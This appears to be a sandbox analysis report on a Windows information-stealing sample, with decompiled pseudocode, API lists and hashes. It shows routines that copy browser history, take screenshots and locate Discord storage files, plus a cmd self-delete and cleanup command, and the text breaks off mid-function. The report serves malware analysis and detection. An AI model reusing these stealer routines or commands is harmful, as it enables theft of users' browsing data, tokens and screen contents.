                                                                                				GetCurrentDirectoryA(0x104, _t73 + 0x90);
                                                                                				 *0x44a1b8(_t73 + 0x90, "\\temp", _t65, _t69);
                                                                                				CopyFileA(_t66, _t73 + 0x90, 1);
                                                                                				E00427E30(_t73 - 0x74, 0, 0x104);
                                                                                				wsprintfA(_t73 - 0x74, "History\\%s_%s.txt",  *((intOrPtr*)(_t73 - 0x80)), __ebx);
                                                                                				_t39 =  *0x44a0a4(_t73 + 0x90, _t73 - 0x7c);
                                                                                				_t77 = _t75 - 0x218 + 0x24;
                                                                                				if(_t39 == 0) {
                                                                                					_t44 =  *0x44a058( *((intOrPtr*)(_t73 - 0x7c)), "SELECT url FROM urls", 0xffffffff, _t73 - 0x78, 0);
                                                                                					_t79 = _t77 + 0x14;
                                                                                					if(_t44 == 0) {
                                                                                						_t68 = E00420300(_t73 - 0x74, "w");
                                                                                						if(_t68 != 0) {
                                                                                							_t49 =  *0x44a074( *((intOrPtr*)(_t73 - 0x78)));
                                                                                							while(1) {
                                                                                								_t83 = _t49 - 0x64;
                                                                                								if(_t49 != 0x64) {
                                                                                									break;
                                                                                								}
                                                                                								 *0x44a094( *((intOrPtr*)(_t73 - 0x78)), 0);
                                                                                								E0041E879(_t54, _t68, 0, __eflags);
                                                                                								_t49 =  *0x44a074( *((intOrPtr*)(_t73 - 0x78)), _t68, "%s\n",  *0x44a094( *((intOrPtr*)(_t73 - 0x78)), 0));
                                                                                								_t79 = _t79 + 0x20;
                                                                                							}
                                                                                							_push(_t68);
                                                                                							E0041EAA2(_t54, _t68, 0, _t83);
                                                                                						}
                                                                                					}
                                                                                					 *0x44a078( *((intOrPtr*)(_t73 - 0x78)));
                                                                                					 *0x44a0a8( *((intOrPtr*)(_t73 - 0x7c)));
                                                                                				}
                                                                                				_t41 = DeleteFileA(_t73 + 0x90);
                                                                                				_pop(_t67);
                                                                                				_pop(_t72);
                                                                                				return E0041DEB4(_t41, _t54,  *(_t73 + 0x194) ^ _t73, _t64, _t67, _t72);
                                                                                			}






















                                                                                0x004104f2
                                                                                0x004104f2
                                                                                0x004104f3
                                                                                0x00410500
                                                                                0x00410507
                                                                                0x00410515
                                                                                0x00410525
                                                                                0x00410527
                                                                                0x00410539
                                                                                0x00410549
                                                                                0x00410557
                                                                                0x00410569
                                                                                0x0041057a
                                                                                0x00410580
                                                                                0x00410585
                                                                                0x0041059a
                                                                                0x004105a0
                                                                                0x004105a5
                                                                                0x004105b5
                                                                                0x004105bb
                                                                                0x004105c0
                                                                                0x004105f5
                                                                                0x004105f5
                                                                                0x004105f8
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004105cd
                                                                                0x004105e4
                                                                                0x004105ec
                                                                                0x004105f2
                                                                                0x004105f2
                                                                                0x004105fa
                                                                                0x004105fb
                                                                                0x00410600
                                                                                0x004105bb
                                                                                0x00410604
                                                                                0x0041060d
                                                                                0x00410614
                                                                                0x0041061c
                                                                                0x00410628
                                                                                0x0041062b
                                                                                0x00410638

                                                                                APIs
                                                                                • GetCurrentDirectoryA.KERNEL32(00000104,?,?,?), ref: 00410527
                                                                                • lstrcat.KERNEL32(?,\temp), ref: 00410539
                                                                                • CopyFileA.KERNEL32 ref: 00410549
                                                                                • _memset.LIBCMT ref: 00410557
                                                                                • wsprintfA.USER32 ref: 00410569
                                                                                • DeleteFileA.KERNEL32(?), ref: 0041061C
                                                                                  • Part of subcall function 00420300: __fsopen.LIBCMT ref: 0042030D
                                                                                • _fprintf.LIBCMT ref: 004105E4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CopyCurrentDeleteDirectory__fsopen_fprintf_memsetlstrcatwsprintf
                                                                                • String ID: %s$History\%s_%s.txt$SELECT url FROM urls$\temp
                                                                                • API String ID: 2003248957-2199967400
                                                                                • Opcode ID: 74ab27de941d808c8b04fbdcd61beefebd078a6fa58d223668c448af2c25d352
                                                                                • Instruction ID: f207117376f4ccc7e290a4b0540f9da8f9dd811e54241f0de67bd91d847a61c1
                                                                                • Opcode Fuzzy Hash: 74ab27de941d808c8b04fbdcd61beefebd078a6fa58d223668c448af2c25d352
                                                                                • Instruction Fuzzy Hash: 21318176940118AFEB209FB5EC48EEE7B7CEF05314F10002AF609D2061DB7995A48F59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 61%
                                                                                			E00417C86(int __ebx, int __ecx) {
                                                                                				signed int _v8;
                                                                                				char _v24;
                                                                                				struct HWND__* _v28;
                                                                                				void* _v32;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				signed int _t18;
                                                                                				void* _t22;
                                                                                				int _t25;
                                                                                				char* _t28;
                                                                                				struct HDC__** _t34;
                                                                                				void* _t42;
                                                                                				int _t43;
                                                                                				int _t44;
                                                                                				signed int _t46;
                                                                                
                                                                                				_t36 = __ebx;
                                                                                				_t18 =  *0x447674; // 0x4124c941
                                                                                				_v8 = _t18 ^ _t46;
                                                                                				_t43 = __ecx;
                                                                                				_v28 = CreateCompatibleDC(0);
                                                                                				_t22 = CreateCompatibleBitmap(GetDC(0), __ecx, __ebx);
                                                                                				_v32 = _t22;
                                                                                				SelectObject(_v28, _t22);
                                                                                				_t25 = BitBlt(_v28, 0, 0, _t43, __ebx, GetDC(0), 0, 0, 0xcc0020);
                                                                                				__imp__GdipAlloc(0x10);
                                                                                				_t44 = _t25;
                                                                                				if(_t44 == 0) {
                                                                                					_t44 = 0;
                                                                                				} else {
                                                                                					_t34 =  &_v28;
                                                                                					 *_t44 = 0x4426e8;
                                                                                					_v28 = 0;
                                                                                					__imp__GdipCreateBitmapFromHBITMAP(_v32, 0, _t34);
                                                                                					 *((intOrPtr*)(_t44 + 8)) = _t34;
                                                                                					 *(_t44 + 4) = _v28;
                                                                                				}
                                                                                				E00417BCB(_t44,  &_v24);
                                                                                				_t28 =  &_v24;
                                                                                				__imp__GdipSaveImageToFile( *(_t44 + 4), L"screenshot.jpg", _t28, 0);
                                                                                				if(_t28 != 0) {
                                                                                					 *((intOrPtr*)(_t44 + 8)) = _t28;
                                                                                				}
                                                                                				 *((intOrPtr*)( *_t44))();
                                                                                				DeleteObject(_v32);
                                                                                				return E0041DEB4(1, _t36, _v8 ^ _t46, _t42, _t44, 0, 1);
                                                                                			}


















                                                                                0x00417c86
                                                                                0x00417c8c
                                                                                0x00417c93
                                                                                0x00417c9b
                                                                                0x00417ca6
                                                                                0x00417cb0
                                                                                0x00417cba
                                                                                0x00417cbd
                                                                                0x00417cd9
                                                                                0x00417ce1
                                                                                0x00417ce7
                                                                                0x00417ceb
                                                                                0x00417d0f
                                                                                0x00417ced
                                                                                0x00417ced
                                                                                0x00417cf5
                                                                                0x00417cfb
                                                                                0x00417cfe
                                                                                0x00417d04
                                                                                0x00417d0a
                                                                                0x00417d0a
                                                                                0x00417d15
                                                                                0x00417d1c
                                                                                0x00417d28
                                                                                0x00417d30
                                                                                0x00417d32
                                                                                0x00417d32
                                                                                0x00417d3b
                                                                                0x00417d40
                                                                                0x00417d55

                                                                                APIs
                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 00417C9D
                                                                                • GetDC.USER32(00000000), ref: 00417CA9
                                                                                • CreateCompatibleBitmap.GDI32(00000000), ref: 00417CB0
                                                                                • SelectObject.GDI32(?,00000000), ref: 00417CBD
                                                                                • GetDC.USER32(00000000), ref: 00417CCB
                                                                                • BitBlt.GDI32(?,00000000,00000000,00000000,00000000,00000000), ref: 00417CD9
                                                                                • GdipAlloc.GDIPLUS(00000010,?,?,?,?,?,?,00417D99), ref: 00417CE1
                                                                                • GdipCreateBitmapFromHBITMAP.GDIPLUS(?,00000000,?,?,?,?,?,?,?,00417D99), ref: 00417CFE
                                                                                • GdipSaveImageToFile.GDIPLUS(?,screenshot.jpg,?,00000000,?,?,?,?,?,?,00417D99), ref: 00417D28
                                                                                • DeleteObject.GDI32(?), ref: 00417D40
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateGdip$BitmapCompatibleObject$AllocDeleteFileFromImageSaveSelect
                                                                                • String ID: screenshot.jpg
                                                                                • API String ID: 1869477856-673422685
                                                                                • Opcode ID: a5ee259313fc44183fb39da7d09b52787b0fa2599c0bdd855be26c2ce063b97e
                                                                                • Instruction ID: a51bd929b91848abdc976a8940832b39c572c9b5d1e4807e8fe892be9ceffd25
                                                                                • Opcode Fuzzy Hash: a5ee259313fc44183fb39da7d09b52787b0fa2599c0bdd855be26c2ce063b97e
                                                                                • Instruction Fuzzy Hash: 902189B590121AAFCB009FA5DC49DEFBFB8FF4A710B10402AF505D3210DB749951DBA9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 96%
                                                                                			E00408D8A(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                				CHAR* _t75;
                                                                                				signed char _t76;
                                                                                				CHAR* _t82;
                                                                                				signed char _t83;
                                                                                				intOrPtr* _t91;
                                                                                				intOrPtr* _t101;
                                                                                				char* _t119;
                                                                                				char* _t124;
                                                                                				intOrPtr _t129;
                                                                                				intOrPtr _t131;
                                                                                				intOrPtr _t132;
                                                                                				void* _t137;
                                                                                				void* _t138;
                                                                                				void* _t139;
                                                                                				void* _t140;
                                                                                				void* _t141;
                                                                                				intOrPtr _t142;
                                                                                				char* _t143;
                                                                                				void* _t145;
                                                                                				intOrPtr _t146;
                                                                                				char* _t147;
                                                                                				void* _t148;
                                                                                
                                                                                				_t148 = __eflags;
                                                                                				_push(0x48);
                                                                                				E004219DE(E0043684A, __ebx, __edi, __esi);
                                                                                				_t131 = __ecx;
                                                                                				 *((intOrPtr*)(_t137 - 0x4c)) = __ecx;
                                                                                				_t129 = 0xf;
                                                                                				 *((intOrPtr*)(_t137 - 4)) = 0;
                                                                                				 *((intOrPtr*)(_t137 - 0x18)) = _t129;
                                                                                				 *((intOrPtr*)(_t137 - 0x1c)) = 0;
                                                                                				 *((char*)(_t137 - 0x2c)) = 0;
                                                                                				E00403A16(_t137 - 0x2c, _t148, "\\Local Storage\\leveldb\\CURRENT", 0x1e);
                                                                                				 *((char*)(_t137 - 4)) = 1;
                                                                                				_t75 = E0040D3FA(_t137 - 0x2c, _t137 - 0x48, _t131, _t137 - 0x2c);
                                                                                				_t139 = _t138 + 0xc;
                                                                                				if(_t75[0x14] >= 0x10) {
                                                                                					_t75 =  *_t75;
                                                                                				}
                                                                                				_t76 = GetFileAttributesA(_t75);
                                                                                				if(_t76 == 0xffffffff || (_t76 & 0x00000010) != 0) {
                                                                                					_t132 = 0;
                                                                                					__eflags = 0;
                                                                                				} else {
                                                                                					_t132 = 1;
                                                                                				}
                                                                                				E00402C34(_t137 - 0x48, 1, 0);
                                                                                				 *((char*)(_t137 - 4)) = 0;
                                                                                				E00402C34(_t137 - 0x2c, 1, 0);
                                                                                				_t152 = _t132;
                                                                                				if(_t132 != 0) {
                                                                                					 *((intOrPtr*)(_t137 - 0x18)) = _t129;
                                                                                					 *((intOrPtr*)(_t137 - 0x1c)) = 0;
                                                                                					 *((char*)(_t137 - 0x2c)) = 0;
                                                                                					E00403A16(_t137 - 0x2c, _t152, "\\Local Storage\\leveldb", 0x16);
                                                                                					 *((char*)(_t137 - 4)) = 2;
                                                                                					_t101 = E0040D3FA(_t137 - 0x2c, _t137 - 0x48,  *((intOrPtr*)(_t137 - 0x4c)), _t137 - 0x2c);
                                                                                					_t145 = _t139 + 0xc;
                                                                                					 *((char*)(_t137 - 4)) = 3;
                                                                                					_t153 =  *((intOrPtr*)(_t101 + 0x14)) - 0x10;
                                                                                					if( *((intOrPtr*)(_t101 + 0x14)) >= 0x10) {
                                                                                						_t101 =  *_t101;
                                                                                					}
                                                                                					_push(_t101);
                                                                                					_t146 = _t145 - 0x1c;
                                                                                					 *((intOrPtr*)(_t137 - 0x54)) = _t146;
                                                                                					E0040410F(_t146, _t137 + 8);
                                                                                					_t147 = _t146 - 0x1c;
                                                                                					 *((char*)(_t137 - 4)) = 4;
                                                                                					_t124 = _t147;
                                                                                					 *((intOrPtr*)(_t137 - 0x50)) = _t147;
                                                                                					 *((intOrPtr*)(_t124 + 0x14)) = _t129;
                                                                                					 *((intOrPtr*)(_t124 + 0x10)) = 0;
                                                                                					 *_t124 = 0;
                                                                                					E0040381A(_t124, "Discord");
                                                                                					 *((char*)(_t137 - 4)) = 3;
                                                                                					E00408B6B(0, "Local Storage", _t129, _t146, _t153);
                                                                                					_t139 = _t147 + 0x3c;
                                                                                					E00402C34(_t137 - 0x48, 1, 0);
                                                                                					 *((char*)(_t137 - 4)) = 0;
                                                                                					E00402C34(_t137 - 0x2c, 1, 0);
                                                                                				}
                                                                                				 *((intOrPtr*)(_t137 - 0x18)) = _t129;
                                                                                				 *((intOrPtr*)(_t137 - 0x1c)) = 0;
                                                                                				 *((char*)(_t137 - 0x2c)) = 0;
                                                                                				E00403A16(_t137 - 0x2c, _t153, "\\Session Storage\\CURRENT", 0x18);
                                                                                				 *((char*)(_t137 - 4)) = 5;
                                                                                				_t82 = E0040D3FA(_t137 - 0x2c, _t137 - 0x48,  *((intOrPtr*)(_t137 - 0x4c)), _t137 - 0x2c);
                                                                                				_t140 = _t139 + 0xc;
                                                                                				if(_t82[0x14] >= 0x10) {
                                                                                					_t82 =  *_t82;
                                                                                				}
                                                                                				_t83 = GetFileAttributesA(_t82);
                                                                                				if(_t83 == 0xffffffff || (_t83 & 0x00000010) != 0) {
                                                                                					_t133 = 0;
                                                                                					__eflags = 0;
                                                                                				} else {
                                                                                					_t133 = 1;
                                                                                				}
                                                                                				E00402C34(_t137 - 0x48, 1, 0);
                                                                                				 *((char*)(_t137 - 4)) = 0;
                                                                                				E00402C34(_t137 - 0x2c, 1, 0);
                                                                                				_t157 = _t133;
                                                                                				if(_t133 != 0) {
                                                                                					 *((intOrPtr*)(_t137 - 0x18)) = _t129;
                                                                                					 *((intOrPtr*)(_t137 - 0x1c)) = 0;
                                                                                					 *((char*)(_t137 - 0x2c)) = 0;
                                                                                					E00403A16(_t137 - 0x2c, _t157, "\\Session Storage", 0x10);
                                                                                					 *((char*)(_t137 - 4)) = 6;
                                                                                					_t91 = E0040D3FA(_t137 - 0x2c, _t137 - 0x48,  *((intOrPtr*)(_t137 - 0x4c)), _t137 - 0x2c);
                                                                                					_t141 = _t140 + 0xc;
                                                                                					 *((char*)(_t137 - 4)) = 7;
                                                                                					_t158 =  *((intOrPtr*)(_t91 + 0x14)) - 0x10;
                                                                                					if( *((intOrPtr*)(_t91 + 0x14)) >= 0x10) {
                                                                                						_t91 =  *_t91;
                                                                                					}
                                                                                					_push(_t91);
                                                                                					_t142 = _t141 - 0x1c;
                                                                                					_t133 = _t142;
                                                                                					 *((intOrPtr*)(_t137 - 0x50)) = _t142;
                                                                                					E0040410F(_t142, _t137 + 8);
                                                                                					_t143 = _t142 - 0x1c;
                                                                                					 *((char*)(_t137 - 4)) = 8;
                                                                                					_t119 = _t143;
                                                                                					 *((intOrPtr*)(_t137 - 0x54)) = _t143;
                                                                                					 *((intOrPtr*)(_t119 + 0x14)) = _t129;
                                                                                					 *((intOrPtr*)(_t119 + 0x10)) = 0;
                                                                                					 *_t119 = 0;
                                                                                					E0040381A(_t119, "Discord");
                                                                                					 *((char*)(_t137 - 4)) = 7;
                                                                                					E00408B6B(0, "Session Storage", _t129, _t142, _t158);
                                                                                					E00402C34(_t137 - 0x48, 1, 0);
                                                                                					E00402C34(_t137 - 0x2c, 1, 0);
                                                                                				}
                                                                                				E00402C34(_t137 + 8, 1, 0);
                                                                                				return E00421A61(0, _t129, _t133);
                                                                                			}

























                                                                                0x00408d8a
                                                                                0x00408d8a
                                                                                0x00408d91
                                                                                0x00408d96
                                                                                0x00408d98
                                                                                0x00408d9d
                                                                                0x00408da0
                                                                                0x00408dad
                                                                                0x00408db0
                                                                                0x00408db3
                                                                                0x00408db6
                                                                                0x00408dc4
                                                                                0x00408dc8
                                                                                0x00408dcd
                                                                                0x00408dd4
                                                                                0x00408dd6
                                                                                0x00408dd6
                                                                                0x00408dd9
                                                                                0x00408de2
                                                                                0x00408ded
                                                                                0x00408ded
                                                                                0x00408de8
                                                                                0x00408dea
                                                                                0x00408dea
                                                                                0x00408df5
                                                                                0x00408e00
                                                                                0x00408e03
                                                                                0x00408e08
                                                                                0x00408e0a
                                                                                0x00408e1a
                                                                                0x00408e1d
                                                                                0x00408e20
                                                                                0x00408e23
                                                                                0x00408e33
                                                                                0x00408e37
                                                                                0x00408e3c
                                                                                0x00408e3f
                                                                                0x00408e43
                                                                                0x00408e47
                                                                                0x00408e49
                                                                                0x00408e49
                                                                                0x00408e4b
                                                                                0x00408e4c
                                                                                0x00408e54
                                                                                0x00408e58
                                                                                0x00408e5d
                                                                                0x00408e60
                                                                                0x00408e64
                                                                                0x00408e66
                                                                                0x00408e69
                                                                                0x00408e6c
                                                                                0x00408e74
                                                                                0x00408e76
                                                                                0x00408e80
                                                                                0x00408e84
                                                                                0x00408e89
                                                                                0x00408e92
                                                                                0x00408e9d
                                                                                0x00408ea0
                                                                                0x00408ea0
                                                                                0x00408eaf
                                                                                0x00408eb2
                                                                                0x00408eb5
                                                                                0x00408eb8
                                                                                0x00408ec8
                                                                                0x00408ecc
                                                                                0x00408ed1
                                                                                0x00408ed8
                                                                                0x00408eda
                                                                                0x00408eda
                                                                                0x00408edd
                                                                                0x00408ee6
                                                                                0x00408ef1
                                                                                0x00408ef1
                                                                                0x00408eec
                                                                                0x00408eee
                                                                                0x00408eee
                                                                                0x00408ef9
                                                                                0x00408f04
                                                                                0x00408f07
                                                                                0x00408f0c
                                                                                0x00408f0e
                                                                                0x00408f1e
                                                                                0x00408f21
                                                                                0x00408f24
                                                                                0x00408f27
                                                                                0x00408f37
                                                                                0x00408f3b
                                                                                0x00408f40
                                                                                0x00408f43
                                                                                0x00408f47
                                                                                0x00408f4b
                                                                                0x00408f4d
                                                                                0x00408f4d
                                                                                0x00408f4f
                                                                                0x00408f50
                                                                                0x00408f56
                                                                                0x00408f58
                                                                                0x00408f5c
                                                                                0x00408f61
                                                                                0x00408f64
                                                                                0x00408f68
                                                                                0x00408f6a
                                                                                0x00408f6d
                                                                                0x00408f70
                                                                                0x00408f78
                                                                                0x00408f7a
                                                                                0x00408f84
                                                                                0x00408f88
                                                                                0x00408f96
                                                                                0x00408fa1
                                                                                0x00408fa1
                                                                                0x00408fac
                                                                                0x00408fb6

                                                                                APIs
                                                                                • __EH_prolog3_GS.LIBCMT ref: 00408D91
                                                                                • GetFileAttributesA.KERNEL32(00000000), ref: 00408DD9
                                                                                • GetFileAttributesA.KERNEL32(00000000), ref: 00408EDD
                                                                                  • Part of subcall function 00402C34: _memmove.LIBCMT ref: 00402C53
                                                                                  • Part of subcall function 00403A16: _memmove.LIBCMT ref: 00403A67
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AttributesFile_memmove$H_prolog3_
                                                                                • String ID: Discord$Local Storage$Session Storage$\Local Storage\leveldb$\Local Storage\leveldb\CURRENT$\Session Storage$\Session Storage\CURRENT
                                                                                • API String ID: 3897036665-2019736363
                                                                                • Opcode ID: 77873705305797e79846ad8ca8a139fed172b08db23b550f555bffd445ecd5d7
                                                                                • Instruction ID: 58f3edf5dd504767c655dd6b14a28e644c8b2ac7b9e3a0a1c009e80bcc8cebfa
                                                                                • Opcode Fuzzy Hash: 77873705305797e79846ad8ca8a139fed172b08db23b550f555bffd445ecd5d7
                                                                                • Instruction Fuzzy Hash: E761C570C0124CAEDB14EFA9C546ADEBF78DF15304F10806EE554B72D2C7B85A09CBA6
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 78%
                                                                                			E004179DA(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                				void* __ebp;
                                                                                				signed int _t38;
                                                                                				void* _t43;
                                                                                				void* _t45;
                                                                                				void* _t47;
                                                                                				void* _t49;
                                                                                				void* _t51;
                                                                                				void* _t53;
                                                                                				intOrPtr _t64;
                                                                                				void* _t67;
                                                                                				void* _t74;
                                                                                				void* _t75;
                                                                                				void* _t88;
                                                                                				intOrPtr _t92;
                                                                                				void* _t93;
                                                                                				void* _t97;
                                                                                				signed int _t98;
                                                                                				void* _t100;
                                                                                
                                                                                				_t88 = __edx;
                                                                                				_t75 = __ecx;
                                                                                				_t98 = _t100 - 0xc0;
                                                                                				_t38 =  *0x447674; // 0x4124c941
                                                                                				 *(_t98 + 0xc4) = _t38 ^ _t98;
                                                                                				_push(0x3c);
                                                                                				E00421975(E00436481, __ebx, __edi, __esi);
                                                                                				_t43 = E00417713(_t98 + 0x1c, GetCurrentProcessId());
                                                                                				 *((intOrPtr*)(_t98 - 4)) = 0;
                                                                                				_push(GetCurrentProcessId());
                                                                                				_t45 = E00417918(_t98 + 0x54);
                                                                                				 *((char*)(_t98 - 4)) = 1;
                                                                                				_t47 = E0040D3FA(_t75, _t98 + 0x70, "/c taskkill /im ", _t45);
                                                                                				 *((char*)(_t98 - 4)) = 2;
                                                                                				_t49 = E0040D3C3(_t75, _t98 + 0x8c, _t47, " /f & timeout /t 6 & del /f /q \"");
                                                                                				 *((char*)(_t98 - 4)) = 3;
                                                                                				_t51 = E0040D431(_t43, _t98);
                                                                                				 *((char*)(_t98 - 4)) = 4;
                                                                                				_t53 = E0040D3C3(_t49, _t98 + 0x38, _t51, "\" & del C:\\ProgramData\\*.dll");
                                                                                				 *((char*)(_t98 - 4)) = 5;
                                                                                				E0040D3C3(_t49, _t98 + 0xa8, _t53, " & exit");
                                                                                				E00402C34(_t98 + 0x38, 1, 0);
                                                                                				E00402C34(_t98, 1, 0);
                                                                                				E00402C34(_t98 + 0x8c, 1, 0);
                                                                                				E00402C34(_t98 + 0x70, 1, 0);
                                                                                				E00402C34(_t98 + 0x54, 1, 0);
                                                                                				 *((char*)(_t98 - 4)) = 0xc;
                                                                                				E00402C34(_t98 + 0x1c, 1, 0);
                                                                                				_t92 = 0x3c;
                                                                                				E00427E30(_t98 - 0x48, 0, _t92);
                                                                                				_t64 =  *((intOrPtr*)(_t98 + 0xa8));
                                                                                				 *((intOrPtr*)(_t98 - 0x48)) = _t92;
                                                                                				 *((intOrPtr*)(_t98 - 0x44)) = 0;
                                                                                				 *((intOrPtr*)(_t98 - 0x40)) = 0;
                                                                                				 *(_t98 - 0x3c) = "open";
                                                                                				 *(_t98 - 0x38) = "C:\\Windows\\System32\\cmd.exe";
                                                                                				if( *((intOrPtr*)(_t98 + 0xbc)) < 0x10) {
                                                                                					_t64 = _t98 + 0xa8;
                                                                                				}
                                                                                				 *((intOrPtr*)(_t98 - 0x34)) = _t64;
                                                                                				 *((intOrPtr*)(_t98 - 0x30)) = 0;
                                                                                				 *((intOrPtr*)(_t98 - 0x2c)) = 0;
                                                                                				 *((intOrPtr*)(_t98 - 0x28)) = 0;
                                                                                				 *0x44a1f8(_t98 - 0x48);
                                                                                				_t67 = E00402C34(_t98 + 0xa8, 1, 0);
                                                                                				 *[fs:0x0] =  *((intOrPtr*)(_t98 - 0xc));
                                                                                				_pop(_t93);
                                                                                				_pop(_t97);
                                                                                				_pop(_t74);
                                                                                				return E0041DEB4(_t67, _t74,  *(_t98 + 0xc4) ^ _t98, _t88, _t93, _t97);
                                                                                			}





















                                                                                0x004179da
                                                                                0x004179da
                                                                                0x004179e1
                                                                                0x004179e5
                                                                                0x004179ec
                                                                                0x004179f2
                                                                                0x004179f9
                                                                                0x00417a0a
                                                                                0x00417a13
                                                                                0x00417a18
                                                                                0x00417a1c
                                                                                0x00417a2e
                                                                                0x00417a31
                                                                                0x00417a43
                                                                                0x00417a47
                                                                                0x00417a53
                                                                                0x00417a57
                                                                                0x00417a66
                                                                                0x00417a6a
                                                                                0x00417a7c
                                                                                0x00417a80
                                                                                0x00417a8d
                                                                                0x00417a96
                                                                                0x00417aa3
                                                                                0x00417aad
                                                                                0x00417ab7
                                                                                0x00417abd
                                                                                0x00417ac5
                                                                                0x00417acc
                                                                                0x00417ad3
                                                                                0x00417ad8
                                                                                0x00417ae8
                                                                                0x00417aeb
                                                                                0x00417aee
                                                                                0x00417af1
                                                                                0x00417af8
                                                                                0x00417aff
                                                                                0x00417b01
                                                                                0x00417b01
                                                                                0x00417b07
                                                                                0x00417b0e
                                                                                0x00417b11
                                                                                0x00417b14
                                                                                0x00417b17
                                                                                0x00417b25
                                                                                0x00417b2d
                                                                                0x00417b35
                                                                                0x00417b36
                                                                                0x00417b37
                                                                                0x00417b4c

                                                                                APIs
                                                                                • __EH_prolog3.LIBCMT ref: 004179F9
                                                                                • GetCurrentProcessId.KERNEL32(0000003C), ref: 00417A04
                                                                                  • Part of subcall function 00417713: OpenProcess.KERNEL32(00000410,00000000,0040AD62,00000000,00000000), ref: 0041773A
                                                                                  • Part of subcall function 00417713: GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 00417754
                                                                                  • Part of subcall function 00417713: CloseHandle.KERNEL32(00000000), ref: 0041775B
                                                                                • GetCurrentProcessId.KERNEL32(00000000), ref: 00417A16
                                                                                  • Part of subcall function 00417918: _memset.LIBCMT ref: 00417959
                                                                                  • Part of subcall function 00417918: OpenProcess.KERNEL32(00000410,00000000,?,?,00000000,00000000), ref: 0041796B
                                                                                  • Part of subcall function 00417918: EnumProcessModules.PSAPI(00000000,?,00000004,?,?,00000000,00000000), ref: 00417982
                                                                                  • Part of subcall function 00417918: GetModuleBaseNameA.PSAPI(00000000,?,?,00000104,?,00000000,00000000), ref: 00417999
                                                                                  • Part of subcall function 00417918: CloseHandle.KERNEL32(00000000,?,00000000,00000000), ref: 004179A0
                                                                                  • Part of subcall function 00402C34: _memmove.LIBCMT ref: 00402C53
                                                                                • _memset.LIBCMT ref: 00417AD3
                                                                                • ShellExecuteEx.SHELL32(?), ref: 00417B17
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Process$CloseCurrentHandleModuleNameOpen_memset$BaseEnumExecuteFileH_prolog3ModulesShell_memmove
                                                                                • String ID: & exit$ /f & timeout /t 6 & del /f /q "$" & del C:\ProgramData\*.dll$/c taskkill /im $t&D
                                                                                • API String ID: 1885640224-3690632989
                                                                                • Opcode ID: 1ac7323dfcd76826bae77427d14ccdd60a79c14ef8668bc3115f382a70a13d5b
                                                                                • Instruction ID: f2fe229286dc5b8cd2e6409dfae781f0c56afba22a1cd5bd27651a8d6bb83568
                                                                                • Opcode Fuzzy Hash: 1ac7323dfcd76826bae77427d14ccdd60a79c14ef8668bc3115f382a70a13d5b
                                                                                • Instruction Fuzzy Hash: 12418171905258ABEB25EF99CD85FDF7BBCAF14304F00442BF405A3181DB785A09CB69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 20%
                                                                                			E00410639(CHAR* __ecx, void* __edx) {
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				void* __ebp;
                                                                                				signed int _t24;
                                                                                				void* _t39;
                                                                                				int _t41;
                                                                                				void* _t44;
                                                                                				void* _t49;
                                                                                				intOrPtr _t50;
                                                                                				void* _t54;
                                                                                				void* _t55;
                                                                                				void* _t56;
                                                                                				void* _t57;
                                                                                				void* _t68;
                                                                                				CHAR* _t69;
